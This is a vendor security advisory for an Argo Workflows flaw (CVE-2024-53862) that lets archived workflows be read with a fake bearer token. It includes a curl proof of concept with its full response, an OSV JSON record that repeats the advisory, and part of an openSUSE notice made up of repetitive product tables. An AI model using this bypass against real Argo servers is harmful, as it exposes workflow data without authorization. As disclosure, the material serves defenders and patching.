When using --auth-mode=client, Archived Workflows can be retrieved with a fake or spoofed token via the GET Workflow endpoint: /api/v1/workflows/{namespace}/{name}
When using --auth-mode=sso, all Archived Workflows can be retrieved with a valid token via the GET Workflow endpoint: /api/v1/workflows/{namespace}/{name}
Details
No authentication is performed by the Server itself on client tokens[^1]. Authentication & authorization is instead delegated to the k8s API server.
However, the Workflow Archive does not interact with k8s, and so any token that looks valid will be considered authenticated, even if it is not a k8s token or even if the token has no RBAC for Argo. To handle the lack of pass-through k8s authN/authZ, the Workflow Archive specifically does the equivalent of a kubectl auth can-i check for respective methods.
In #12736 / v3.5.7 and #13021 / v3.5.8, the auth check was accidentally removed on the GET Workflow endpoint's fallback to archived workflows on these lines, allowing archived workflows to be retrieved with a fake token.
PoC
Configuration
Controller ConfigMap:
config: |
persistence:
archive: true
postgresql:
database: argoworkflows
host: db-host
passwordSecret:
key: postgresPassword
name: argo-wf-postgres-credentials
port: 5432
tableName: argo_workflows
userNameSecret:
key: username
name: argo-wf-postgres-credentials
Server: --auth-mode=client
Reproduction
Visit a completed, archived workflow URL with an invalid authorization token, this results in the workflow being displayed.
For example, directly query the API and retrieve the workflow data (where Bearer thisisatest is not a valid token):
curl -H 'Authorization: Bearer thisisatest' -v http://localhost:8000/api/v1/workflows/argo/hello-world-7tv5g
Results in a returned workflow:
* Host localhost:8000 was resolved.
* IPv6: ::1
* IPv4: 127.0.0.1
* Trying [::1]:8000...
* Connected to localhost (::1) port 8000
> GET /api/v1/workflows/argo/hello-world-7tv5g HTTP/1.1
> Host: localhost:8000
> User-Agent: curl/8.7.1
> Accept: */*
> Authorization: Bearer thisisatest
>
* Request completely sent off
< HTTP/1.1 200 OK
< Content-Type: application/json
< Grpc-Metadata-Content-Type: application/grpc
< X-Ratelimit-Limit: 1000
< X-Ratelimit-Remaining: 999
< X-Ratelimit-Reset: Mon, 19 Aug 2024 20:44:27 UTC
< Date: Mon, 19 Aug 2024 20:44:26 GMT
< Transfer-Encoding: chunked
<
* Connection #0 to host localhost left intact
{
"metadata": {
"name": "hello-world-7tv5g",
"generateName": "hello-world-",
"namespace": "argo",
"uid": "e5868ab1-f820-4a9e-9407-162346a4ccb4",
"resourceVersion": "9982",
"generation": 3,
"creationTimestamp": "2024-08-13T23:59:20Z",
"labels": {
"workflows.argoproj.io/archive-strategy": "false",
"workflows.argoproj.io/completed": "true",
"workflows.argoproj.io/phase": "Succeeded",
"workflows.argoproj.io/workflow-archiving-status": "Persisted"
},
"annotations": {
"workflows.argoproj.io/description": "This is a simple hello world example.\n",
"workflows.argoproj.io/pod-name-format": "v2"
},
"managedFields": [
{
"manager": "argo",
"operation": "Update",
"apiVersion": "argoproj.io/v1alpha1",
"time": "2024-08-13T23:59:20Z",
"fieldsType": "FieldsV1",
"fieldsV1": {
"f:metadata": {
"f:annotations": {
".": {},
"f:workflows.argoproj.io/description": {}
},
"f:generateName": {},
"f:labels": {
".": {},
"f:workflows.argoproj.io/archive-strategy": {}
}
},
"f:spec": {}
}
},
{
"manager": "workflow-controller",
"operation": "Update",
"apiVersion": "argoproj.io/v1alpha1",
"time": "2024-08-13T23:59:30Z",
"fieldsType": "FieldsV1",
"fieldsV1": {
"f:metadata": {
"f:annotations": {
"f:workflows.argoproj.io/pod-name-format": {}
},
"f:labels": {
"f:workflows.argoproj.io/completed": {},
"f:workflows.argoproj.io/phase": {},
"f:workflows.argoproj.io/workflow-archiving-status": {}
}
},
"f:status": {}
}
}
]
},
"spec": {
"templates": [
{
"name": "hello-world",
"inputs": {},
"outputs": {},
"metadata": {},
"container": {
"name": "",
"image": "busybox",
"command": [
"echo"
],
"args": [
"hello world"
],
"resources": {}
}
}
],
"entrypoint": "hello-world",
"arguments": {},
"serviceAccountName": "argo-workflow"
},
"status": {
"phase": "Succeeded",
"startedAt": "2024-08-13T23:59:20Z",
"finishedAt": "2024-08-13T23:59:30Z",
"progress": "1/1",
"nodes": {
"hello-world-7tv5g": {
"id": "hello-world-7tv5g",
"name": "hello-world-7tv5g",
"displayName": "hello-world-7tv5g",
"type": "Pod",
"templateName": "hello-world",
"templateScope": "local/hello-world-7tv5g",
"phase": "Succeeded",
"startedAt": "2024-08-13T23:59:20Z",
"finishedAt": "2024-08-13T23:59:24Z",
"progress": "1/1",
"resourcesDuration": {
"cpu": 0,
"memory": 3
},
"outputs": {
"exitCode": "0"
},
"hostNodeName": "kind-control-plane"
}
},
"conditions": [
{
"type": "PodRunning",
"status": "False"
},
{
"type": "Completed",
"status": "True"
}
],
"resourcesDuration": {
"cpu": 0,
"memory": 3
},
"artifactRepositoryRef": {
"default": true,
"artifactRepository": {}
},
"artifactGCStatus": {
"notSpecified": true
},
"taskResultsCompletionStatus": {
"hello-world-7tv5g": true
}
}
}%
Impact
Users of the Server with --auth-mode=client and with persistence.archive: true are vulnerable to having Archived Workflows retrieved with a fake or spoofed token.
Users of the Server with --auth-mode=sso and with persistence.archive: true are vulnerable to users being able to access workflows they could not access before archiving.
[^1]: sso tokens, on the other hand, are immediately "authorized". The naming in the codebase is a bit confusing; it would be more appropriate to say "authenticated" in this case, as authorization is via SSO RBAC / SA matching / k8s API server. In this same section of the codebase, the client tokens are not authenticated, they are only validated. Authentication and authorization are done simultaneously for client tokens via the k8s API server.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-workflows/v3"
},
"ranges": [
{
"events": [
{
"introduced": "3.5.7"
},
{
"fixed": "3.5.13"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-workflows/v3"
},
"ranges": [
{
"events": [
{
"introduced": "3.6.0"
},
{
"fixed": "3.6.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-53862"
],
"database_specific": {
"cwe_ids": [
"CWE-200"
],
"github_reviewed": true,
"github_reviewed_at": "2024-12-02T22:17:55Z",
"nvd_published_at": "2024-12-02T16:15:14Z",
"severity": "MODERATE"
},
"details": "### Summary\n\nWhen using `--auth-mode=client`, Archived Workflows can be retrieved with a fake or spoofed token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}`\n\nWhen using `--auth-mode=sso`, all Archived Workflows can be retrieved with a valid token via the GET Workflow endpoint: `/api/v1/workflows/{namespace}/{name}`\n\n### Details\n\nNo authentication is performed by the Server itself on `client` tokens[^1]. Authentication \u0026 authorization is instead delegated to the k8s API server.\nHowever, the [Workflow Archive](https://github.com/argoproj/argo-workflows/blob/52cca7e079a4f6d76db303ac550b1876e51b3865/server/workflowarchive/archived_workflow_server.go) does not interact with k8s, and so any token that [_looks_](https://github.com/argoproj/argo-workflows/blob/52cca7e079a4f6d76db303ac550b1876e51b3865/server/auth/mode.go#L37) [valid](https://github.com/argoproj/argo-workflows/blob/52cca7e079a4f6d76db303ac550b1876e51b3865/server/auth/gatekeeper.go#L185) will be considered authenticated, even if it is not a k8s token or even if the token has no RBAC for Argo. 
To handle the lack of pass-through k8s authN/authZ, the Workflow Archive specifically does [the equivalent of a `kubectl auth can-i`](https://github.com/argoproj/argo-workflows/blob/52cca7e079a4f6d76db303ac550b1876e51b3865/server/workflowarchive/archived_workflow_server.go#L50) check for respective methods.\n\nIn #12736 / v3.5.7 and #13021 / v3.5.8, the auth check was accidentally removed on the GET Workflow endpoint\u0027s fallback to archived workflows on [these lines](https://github.com/argoproj/argo-workflows/pull/13021/files#diff-a5b255abaceddc9cc20bf6da6ae92c3a5d3605d94366af503ed754c079a1171aL668-R715), allowing archived workflows to be retrieved with a fake token.\n\n### PoC\n\n#### Configuration\n\nController `ConfigMap`:\n```yaml\n config: |\n persistence:\n archive: true\n postgresql:\n database: argoworkflows\n host: db-host\n passwordSecret:\n key: postgresPassword\n name: argo-wf-postgres-credentials\n port: 5432\n tableName: argo_workflows\n userNameSecret:\n key: username\n name: argo-wf-postgres-credentials\n```\n\nServer: `--auth-mode=client`\n\n#### Reproduction\n\nVisit a completed, archived workflow URL with an invalid authorization token, this results in the workflow being displayed.\n\nFor example, directly query the API and retrieve the workflow data (where `Bearer thisisatest` is not a valid token):\n\n```sh\ncurl -H \u0027Authorization: Bearer thisisatest\u0027 -v http://localhost:8000/api/v1/workflows/argo/hello-world-7tv5g\n```\n\n\u003cdetails\u003e\u003csummary\u003eResults in a returned workflow:\u003c/summary\u003e\n\n```\n* Host localhost:8000 was resolved.\n* IPv6: ::1\n* IPv4: 127.0.0.1\n* Trying [::1]:8000...\n* Connected to localhost (::1) port 8000\n\u003e GET /api/v1/workflows/argo/hello-world-7tv5g HTTP/1.1\n\u003e Host: localhost:8000\n\u003e User-Agent: curl/8.7.1\n\u003e Accept: */*\n\u003e Authorization: Bearer thisisatest\n\u003e\n* Request completely sent off\n\u003c HTTP/1.1 200 OK\n\u003c Content-Type: 
application/json\n\u003c Grpc-Metadata-Content-Type: application/grpc\n\u003c X-Ratelimit-Limit: 1000\n\u003c X-Ratelimit-Remaining: 999\n\u003c X-Ratelimit-Reset: Mon, 19 Aug 2024 20:44:27 UTC\n\u003c Date: Mon, 19 Aug 2024 20:44:26 GMT\n\u003c Transfer-Encoding: chunked\n\u003c\n* Connection #0 to host localhost left intact\n{\n \"metadata\": {\n \"name\": \"hello-world-7tv5g\",\n \"generateName\": \"hello-world-\",\n \"namespace\": \"argo\",\n \"uid\": \"e5868ab1-f820-4a9e-9407-162346a4ccb4\",\n \"resourceVersion\": \"9982\",\n \"generation\": 3,\n \"creationTimestamp\": \"2024-08-13T23:59:20Z\",\n \"labels\": {\n \"workflows.argoproj.io/archive-strategy\": \"false\",\n \"workflows.argoproj.io/completed\": \"true\",\n \"workflows.argoproj.io/phase\": \"Succeeded\",\n \"workflows.argoproj.io/workflow-archiving-status\": \"Persisted\"\n },\n \"annotations\": {\n \"workflows.argoproj.io/description\": \"This is a simple hello world example.\\n\",\n \"workflows.argoproj.io/pod-name-format\": \"v2\"\n },\n \"managedFields\": [\n {\n \"manager\": \"argo\",\n \"operation\": \"Update\",\n \"apiVersion\": \"argoproj.io/v1alpha1\",\n \"time\": \"2024-08-13T23:59:20Z\",\n \"fieldsType\": \"FieldsV1\",\n \"fieldsV1\": {\n \"f:metadata\": {\n \"f:annotations\": {\n \".\": {},\n \"f:workflows.argoproj.io/description\": {}\n },\n \"f:generateName\": {},\n \"f:labels\": {\n \".\": {},\n \"f:workflows.argoproj.io/archive-strategy\": {}\n }\n },\n \"f:spec\": {}\n }\n },\n {\n \"manager\": \"workflow-controller\",\n \"operation\": \"Update\",\n \"apiVersion\": \"argoproj.io/v1alpha1\",\n \"time\": \"2024-08-13T23:59:30Z\",\n \"fieldsType\": \"FieldsV1\",\n \"fieldsV1\": {\n \"f:metadata\": {\n \"f:annotations\": {\n \"f:workflows.argoproj.io/pod-name-format\": {}\n },\n \"f:labels\": {\n \"f:workflows.argoproj.io/completed\": {},\n \"f:workflows.argoproj.io/phase\": {},\n \"f:workflows.argoproj.io/workflow-archiving-status\": {}\n }\n },\n \"f:status\": {}\n }\n }\n ]\n },\n 
\"spec\": {\n \"templates\": [\n {\n \"name\": \"hello-world\",\n \"inputs\": {},\n \"outputs\": {},\n \"metadata\": {},\n \"container\": {\n \"name\": \"\",\n \"image\": \"busybox\",\n \"command\": [\n \"echo\"\n ],\n \"args\": [\n \"hello world\"\n ],\n \"resources\": {}\n }\n }\n ],\n \"entrypoint\": \"hello-world\",\n \"arguments\": {},\n \"serviceAccountName\": \"argo-workflow\"\n },\n \"status\": {\n \"phase\": \"Succeeded\",\n \"startedAt\": \"2024-08-13T23:59:20Z\",\n \"finishedAt\": \"2024-08-13T23:59:30Z\",\n \"progress\": \"1/1\",\n \"nodes\": {\n \"hello-world-7tv5g\": {\n \"id\": \"hello-world-7tv5g\",\n \"name\": \"hello-world-7tv5g\",\n \"displayName\": \"hello-world-7tv5g\",\n \"type\": \"Pod\",\n \"templateName\": \"hello-world\",\n \"templateScope\": \"local/hello-world-7tv5g\",\n \"phase\": \"Succeeded\",\n \"startedAt\": \"2024-08-13T23:59:20Z\",\n \"finishedAt\": \"2024-08-13T23:59:24Z\",\n \"progress\": \"1/1\",\n \"resourcesDuration\": {\n \"cpu\": 0,\n \"memory\": 3\n },\n \"outputs\": {\n \"exitCode\": \"0\"\n },\n \"hostNodeName\": \"kind-control-plane\"\n }\n },\n \"conditions\": [\n {\n \"type\": \"PodRunning\",\n \"status\": \"False\"\n },\n {\n \"type\": \"Completed\",\n \"status\": \"True\"\n }\n ],\n \"resourcesDuration\": {\n \"cpu\": 0,\n \"memory\": 3\n },\n \"artifactRepositoryRef\": {\n \"default\": true,\n \"artifactRepository\": {}\n },\n \"artifactGCStatus\": {\n \"notSpecified\": true\n },\n \"taskResultsCompletionStatus\": {\n \"hello-world-7tv5g\": true\n }\n }\n}%\n```\n\n\u003c/details\u003e\n\n\n### Impact\n\nUsers of the Server with `--auth-mode=client` and with `persistence.archive: true` are vulnerable to having Archived Workflows retrieved with a fake or spoofed token.\n\nUsers of the Server with `--auth-mode=sso` and with `persistence.archive: true` are vulnerable to users being able to access workflows they could not access before archiving.\n\n[^1]: `sso` tokens, on the other hand, are [immediately 
\"authorized\"](https://github.com/argoproj/argo-workflows/blob/52cca7e079a4f6d76db303ac550b1876e51b3865/server/auth/gatekeeper.go#L207). The naming in the codebase is a bit confusing; it would be more appropriate to say \"authenticated\" in this case, as authorization is via SSO RBAC / SA matching / k8s API server. In this same section of the codebase, the `client` tokens are not authenticated, they are only validated. Authentication and authorization is done simultaneously for `client` tokens via the k8s API server.",
"id": "GHSA-h36c-m3rf-34h9",
"modified": "2024-12-02T22:17:55Z",
"published": "2024-12-02T22:17:55Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-h36c-m3rf-34h9"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-53862"
},
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-workflows/pull/13021/files#diff-a5b255abaceddc9cc20bf6da6ae92c3a5d3605d94366af503ed754c079a1171aL668-R715"
},
{
"type": "PACKAGE",
"url": "https://github.com/argoproj/argo-workflows"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Access to Archived Argo Workflows with Fake Token in `client` mode"
}
OPENSUSE-SU-2024:14567-1
Vulnerability from csaf_opensuse - Published: 2024-12-11 00:00 - Updated: 2024-12-11 00:00
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "govulncheck-vulndb-0.0.20241209T183251-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the govulncheck-vulndb-0.0.20241209T183251-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2024-14567",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_14567-1.json"
},
{
"category": "self",
"summary": "URL for openSUSE-SU-2024:14567-1",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/EK3MV2UFLDNRIXIWLVT5CJNSLB2MKFBU/"
},
{
"category": "self",
"summary": "E-Mail link for openSUSE-SU-2024:14567-1",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/EK3MV2UFLDNRIXIWLVT5CJNSLB2MKFBU/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-10220 page",
"url": "https://www.suse.com/security/cve/CVE-2024-10220/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-36620 page",
"url": "https://www.suse.com/security/cve/CVE-2024-36620/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-36621 page",
"url": "https://www.suse.com/security/cve/CVE-2024-36621/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-36623 page",
"url": "https://www.suse.com/security/cve/CVE-2024-36623/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-37820 page",
"url": "https://www.suse.com/security/cve/CVE-2024-37820/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-43784 page",
"url": "https://www.suse.com/security/cve/CVE-2024-43784/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-45719 page",
"url": "https://www.suse.com/security/cve/CVE-2024-45719/"
},
